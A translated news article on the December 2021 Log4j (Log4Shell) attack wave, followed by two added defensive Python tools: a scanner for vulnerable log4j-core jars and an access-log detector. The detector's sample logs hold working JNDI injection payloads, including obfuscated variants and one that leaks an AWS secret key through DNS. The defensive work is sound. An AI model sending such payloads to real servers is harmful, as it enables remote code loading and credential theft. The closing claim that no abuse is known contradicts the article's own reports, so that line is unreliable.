The waves of attacks are rolling in.

The attacks on millions of private and corporate computers are increasing by the hour, and the responsible authorities have already sounded the alarm.

The critical vulnerability in the popular Java library Log4j has been identified and analyzed, and the gap has for days been closed by the first patches. But because the logging library is embedded in an estimated three billion devices around the world, many doors and gates are still wide open to data thieves.

Thiemo Heeg

Business editor.


Stephan Finsterbusch

Business editor.


According to the IT security analysts at Bitdefender, the true origin of the attacks is disguised: the traffic leads back into the so-called darknet used by criminal hackers. The attacks themselves, however, surface from data centers in Western industrialized countries such as Germany, the United States and the Netherlands. That is the result of an analysis of Bitdefender Labs' honeypots and of telemetry from several hundred million endpoints in the days after the vulnerability became known.

Is Germany a haven for hackers?

The German IT security authority BSI assumes that the vulnerability is being exploited on a broad scale, and a real wave of attacks is expected. "It's as if all the front doors are suddenly open in a city with a high crime rate," says Martin Zugec, one of Bitdefender's technical directors. "That invites thieves." Analyses have already shown that more than a third of all attacks registered worldwide currently originate in Germany. Does that make Germany a haven for hackers? No, says Zugec. Rather, the attackers operate out of the darknet. That way they can stay anonymous, hide their actions and lay false trails. Their tools approach the victims' systems through virtual tunnels, break in via the Log4j vulnerability, take the systems over and then wait for a good opportunity to strike.

"We assume that there could be a real wave of attacks over the Christmas season," says Zugec. And he is not alone in that view. Authorities and security companies around the world are in alarm mode. On the side of the attacked, according to Bitdefender, every second attacked network is currently in the United States, followed by Canada and Great Britain (8 percent each). Germany is in fifth place with 6 percent.

Log4j is the perfect Trojan horse, explains Dominik Bredel of the IT service provider Kyndryl in a blog post. Its actual job, logging data, is rather unspectacular. But since every system needs logging, Log4j is built into billions of computers, and its vulnerability therefore acts like a master key to countless IT systems. Many hackers are currently using automated scanners to comb the internet for exposed Log4j instances. Once one is found, they can plant ransomware on the potential victim's system. This ransomware can initially remain passive, until the day it is activated; it is used like a "sleeper" that is woken at the push of a button, says Zugec of Bitdefender. Even once the patches now available have been applied to an affected IT system, the danger is far from over: patching closes the door, but it does not remove anything that was planted before.

A vicious circle

The software company Microsoft expects state-sponsored attackers from several countries to use increasingly sophisticated techniques to exploit the vulnerability.

Bitdefender reports that the Khonsari ransomware is already in circulation.

The IT security company Check Point said over the weekend that its protective measures had blocked 3.7 million attempted attacks worldwide.

Log4j's developer, the Apache Software Foundation, an open-source organization whose contributors generally work unpaid and make software and components freely available, reacted quickly. Its third update since the vulnerability became known ten days ago has now been released. Christian Grobmeier, a programmer who works on Log4j, wrote on Twitter on Saturday: "I know it's the weekend, but here is a new Log4j-2 version 2.17. Please install this software patch now," he advised; the updates, after all, do their job.
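Installing the patch presupposes knowing where Log4j actually lives on a host, and log4j-core is often buried inside a WAR, EAR or fat jar rather than sitting on disk by itself. The following inventory script is an added example for this article, not tooling from Apache, the BSI or any company quoted here. It assumes that log4j-core jars carry their Maven pom.properties (the official builds do), takes 2.17.0, the release the article mentions, as the baseline to reach, and builds a constructed sample directory so it runs offline; the jar contents are stubs, not real classes.

```python
"""Find every copy of log4j-core on a host, including copies nested inside
WAR/EAR/fat jars, and flag those below the fixed release.

Added example; not Apache's or the BSI's tooling. Assumptions: log4j-core
ships its Maven pom.properties, the baseline is 2.17.0 as the article states,
and the sample tree built below is constructed, not data from a real host.
"""
import io
import os
import re
import tempfile
import zipfile

# Assumption: 2.17.0 is the version to reach. The 2.12.x (Java 7) and 2.3.x
# (Java 6) branches received separate fixes and need to be judged separately.
FIXED = (2, 17, 0)
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# The class behind the exploit; deleting it from the jar is the stop-gap mitigation.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
MAX_DEPTH = 3  # how many levels of nested archives to follow


def parse_version(text):
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    return tuple(int(x) for x in m.groups()) if m else None


def inspect_archive(label, data, findings, depth=0):
    """Record log4j-core copies in one archive, then recurse into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                key, _, val = line.partition("=")
                if key.strip() == "version":
                    version = parse_version(val)
        if version is None and "log4j-core-" in os.path.basename(label):
            version = parse_version(os.path.basename(label))  # fallback: the file name
        if version is not None or JNDI_CLASS in names:
            findings.append({
                "where": label,
                "version": ".".join(map(str, version)) if version else "unknown",
                "vulnerable": version is None or version < FIXED,  # unknown is treated as bad
                "jndi_lookup_present": JNDI_CLASS in names,
            })
        if depth < MAX_DEPTH:
            for name in names:
                if name.lower().endswith(ARCHIVE_EXT):
                    inspect_archive(f"{label}!/{name}", zf.read(name), findings, depth + 1)


def scan_tree(root):
    """Walk a directory tree and inspect every archive found in it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    inspect_archive(path, fh.read(), findings)
    return findings


def build_demo_tree():
    """Constructed sample: an old log4j-core jar, the same with JndiLookup removed,
    a patched copy nested inside a WAR, and an unrelated jar."""
    def fake_core(version, with_jndi_class=True):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
            if with_jndi_class:
                zf.writestr(JNDI_CLASS, b"stub")
        return buf.getvalue()

    root = tempfile.mkdtemp(prefix="log4j-inventory-")
    with open(os.path.join(root, "log4j-core-2.14.1.jar"), "wb") as f:
        f.write(fake_core("2.14.1"))
    with open(os.path.join(root, "log4j-core-2.14.1-mitigated.jar"), "wb") as f:
        f.write(fake_core("2.14.1", with_jndi_class=False))
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.17.0.jar", fake_core("2.17.0"))
        zf.writestr("WEB-INF/web.xml", "<web-app/>")
    with open(os.path.join(root, "app.war"), "wb") as f:
        f.write(war.getvalue())
    other = io.BytesIO()
    with zipfile.ZipFile(other, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
    with open(os.path.join(root, "commons-io-2.11.0.jar"), "wb") as f:
        f.write(other.getvalue())
    return root


if __name__ == "__main__":
    for hit in scan_tree(build_demo_tree()):
        print(hit)
```

Point it at an application directory (or `/`) in place of the demo tree. The two flags are deliberately separate: "vulnerable" compares the version against the baseline, while "jndi_lookup_present" tells you whether the stop-gap of deleting JndiLookup.class was applied to an old copy; a jar flagged vulnerable with the class absent is mitigated against remote code loading but still not patched.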

According to the Federal Office for Information Security (BSI), it is difficult to predict which products and services could be affected, and the extent of the threat cannot yet be stated conclusively. Like the security companies Bitdefender, Kyndryl and Check Point, the BSI sees a threat on a broad front. Even scanning one's own systems cannot rule out that a vulnerable application has already been compromised. The hackers do not only deploy crypto miners and botnets. They also use software built for security testing of IT systems; such tools are small and inconspicuous because they run purely in memory, and they can be injected into systems via Log4j. Crypto miners hijack computing power to "mine" cryptocurrency; botnets are large groups of infected, remotely controlled computers that are misused, for example, for overload attacks (DDoS) on well-known websites.
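The automated scanning described above, and the advice that scanning your own systems is not enough, both turn on what the probes look like in practice: the attacker plants a `${jndi:...}` lookup string in any field the application might log, and a naive search for that literal misses the variants that hide the word "jndi" inside Log4j's own lookup syntax. The detector below is an added example for this article, not code from Bitdefender, Check Point or the BSI. The access-log lines are constructed (addresses from documentation ranges), and the normalizer handles only the lookups commonly abused in probes: `${lower:..}`, `${upper:..}`, and the `${name:-default}` fallback trick, which Log4j resolves to the default when the lookup fails.

```python
"""Spot Log4Shell probes in web-server access logs, including obfuscated forms
that wrap the payload in Log4j's own lookup syntax.

Added example; not code from any company quoted in the article. Sample lines
are constructed; only the lower/upper lookups and the ${x:-default} fallback
are emulated, which covers the common probe obfuscations.
"""
import re

# Constructed sample access-log lines. Attackers put the payload wherever the
# application might log it: User-Agent, request path, Referer, custom headers.
SAMPLE_LOGS = [
    '10.0.0.5 - - [11/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.7 - - [11/Dec/2021:03:15:22 +0000] "GET /login HTTP/1.1" 200 1043 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - - [11/Dec/2021:03:16:40 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.8:1389/x}"',
    '10.0.0.11 - - [11/Dec/2021:03:17:01 +0000] '
    '"GET /${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.9:1099/y} HTTP/1.1" 404 196 "-" "curl/7.79.1"',
    '10.0.0.13 - - [11/Dec/2021:03:18:30 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:dns://${env:AWS_SECRET_ACCESS_KEY}.203.0.113.50}"',
]

_INNERMOST = re.compile(r"\$\{([^${}]*)\}")  # a lookup with nothing nested inside it
_JNDI = re.compile(r"\$\{\s*jndi:\s*(\w+)://([^/}\s]+)", re.IGNORECASE)


def _resolve(match):
    """Emulate how Log4j would evaluate one innermost lookup."""
    body = match.group(1)
    if body.lower().startswith("jndi:"):
        return match.group(0)  # this is what we are hunting for: keep it intact
    if ":-" in body:
        return body.split(":-", 1)[1]  # ${anything:-x}: lookup fails, default x is used
    prefix, sep, rest = body.partition(":")
    if sep and prefix.lower() == "lower":
        return rest.lower()
    if sep and prefix.lower() == "upper":
        return rest.upper()
    # env:, sys:, date:, ...: on the victim these become live values (the classic
    # secret-exfiltration trick); here we drop the wrapper so the intent stays visible.
    return body


def normalize(text, max_rounds=32):
    """Resolve nested lookups inside-out until nothing changes."""
    for _ in range(max_rounds):
        new = _INNERMOST.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def detect(line):
    """Return details of a JNDI probe in the line, or None if there is none."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if not m:
        return None
    return {
        "scheme": m.group(1).lower(),   # ldap, rmi, dns, ...
        "target": m.group(2),           # host[:port] the victim would be made to contact
        "obfuscated": re.search(r"\$\{jndi:", line, re.IGNORECASE) is None,
        "normalized": norm,
    }


def scan(lines):
    """Run detect() over a sequence of log lines and collect the hits with their index."""
    hits = []
    for i, line in enumerate(lines):
        hit = detect(line)
        if hit:
            hit["line"] = i
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(hit["line"], hit["scheme"], hit["target"], "obfuscated" if hit["obfuscated"] else "plain")
```

Feed it real access logs line by line. The "target" field is the useful pivot for incident response: it is the host the vulnerable application would have dialled out to, so a matching outbound LDAP, RMI or DNS connection in firewall or resolver logs turns a probe into a confirmed exploitation attempt. The fifth sample shows why the wrapper is kept visible: a `${env:...}` inside a DNS lookup is an attempt to leak an environment variable through a DNS query, which leaves no JNDI callback at all.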

Cybercriminals can deploy these tools, which have long been popular, because the vulnerable Log4j Java library lets them smuggle code into their victims' IT systems remotely.

Even though no cases of abuse have become known to date, the German cybersecurity authority BSI does not want to lower its "red" warning level to yellow for the time being.